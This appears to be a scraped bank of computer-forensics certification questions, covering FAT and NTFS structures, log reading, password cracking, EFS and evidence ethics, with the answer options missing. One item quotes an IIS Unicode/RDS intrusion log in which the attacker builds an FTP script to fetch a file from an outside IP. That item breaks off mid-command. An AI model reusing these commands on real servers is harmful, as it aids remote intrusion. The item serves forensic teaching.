What happens when a file is deleted by a Microsoft operating system using the FAT file system?
The following excerpt is taken from a honeypot log. The log captures activities across three days. There are several intrusion attempts; however, a few are successful. (Note: The objective of this question is to test whether the student can read basic information from log entries and interpret the nature of attack.)

Apr 24 14:46:46 [4663]: spp_portscan: portscan detected from 194.222.156.169
Apr 24 14:46:46 [4663]: IDS27/FIN Scan: 194.222.156.169:56693 -> 172.16.1.107:482
Apr 24 18:01:05 [4663]: IDS/DNS-version-query: 212.244.97.121:3485 -> 172.16.1.107:53
Apr 24 19:04:01 [4663]: IDS213/ftp-passwd-retrieval: 194.222.156.169:1425 -> 172.16.1.107:21
Apr 25 08:02:41 [5875]: spp_portscan: PORTSCAN DETECTED from 24.9.255.53
Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4499 -> 172.16.1.107:53
Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4630 -> 172.16.1.101:53
Apr 25 02:38:17 [5875]: IDS/RPC-rpcinfo-query: 212.251.1.94:642 -> 172.16.1.107:111
Apr 25 19:37:32 [5875]: IDS230/web-cgi-space-wildcard: 198.173.35.164:4221 -> 172.16.1.107:80
Apr 26 05:45:12 [6283]: IDS212/dns-zone-transfer: 38.31.107.87:2291 -> 172.16.1.101:53
Apr 26 06:43:05 [6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53
Apr 26 06:44:25 victim7 PAM_pwdb[12509]: (login) session opened for user simple by (uid=0)
Apr 26 06:44:36 victim7 PAM_pwdb[12521]: (su) session opened for user simon by simple(uid=506)
Apr 26 06:45:34 [6283]: IDS175/socks-probe: 24.112.167.35:20 -> 172.16.1.107:1080
Apr 26 06:52:10 [6283]: IDS127/telnet-login-incorrect: 172.16.1.107:23 -> 213.28.22.189:4558

From the options given below choose the one which best interprets the following entry:

Apr 26 06:43:05 [6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53
The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The File Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini. He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes an RDS query which results in the commands run as shown below.

“cmd1.exe /c open 213.116.251.162 >ftpcom”
“cmd1.exe /c echo johna2k >>ftpcom”
“cmd1.exe /c echo haxedj00 >>ftpcom”
“cmd1.exe /c echo get n
When reviewing web logs, you see an entry for resource not found in the HTTP status code field. What is the actual error code that you would see in the log for resource not found?
You are called in to assist the police in an investigation involving a suspected drug dealer. The suspect's house was searched by the police after a warrant was obtained, and they located a floppy disk in the suspect's bedroom. The disk contains several files, but they appear to be password protected. What are two common methods used by password cracking software that you can use to obtain the password?
When examining a hard disk without a write-blocker, you should not start Windows because Windows will write data to the:
An employee is suspected of stealing proprietary information belonging to your company that he had no rights to possess. The information was stored on the employee's computer, which was protected with the NTFS Encrypted File System (EFS), and you had observed him copy the files to a floppy disk just before leaving work for the weekend. You detain the employee before he leaves the building, recover the floppy disks and secure his computer. Will you be able to break the encryption so that you can verify that the employee was in possession of the proprietary information?
What type of file is represented by a colon (:) with a name following it in the Master File Table of an NTFS disk?
In Microsoft file structures, sectors are grouped together to form:
While working for a prosecutor, what do you think you should do if the evidence you found appears to be exculpatory and is not being released to the defense?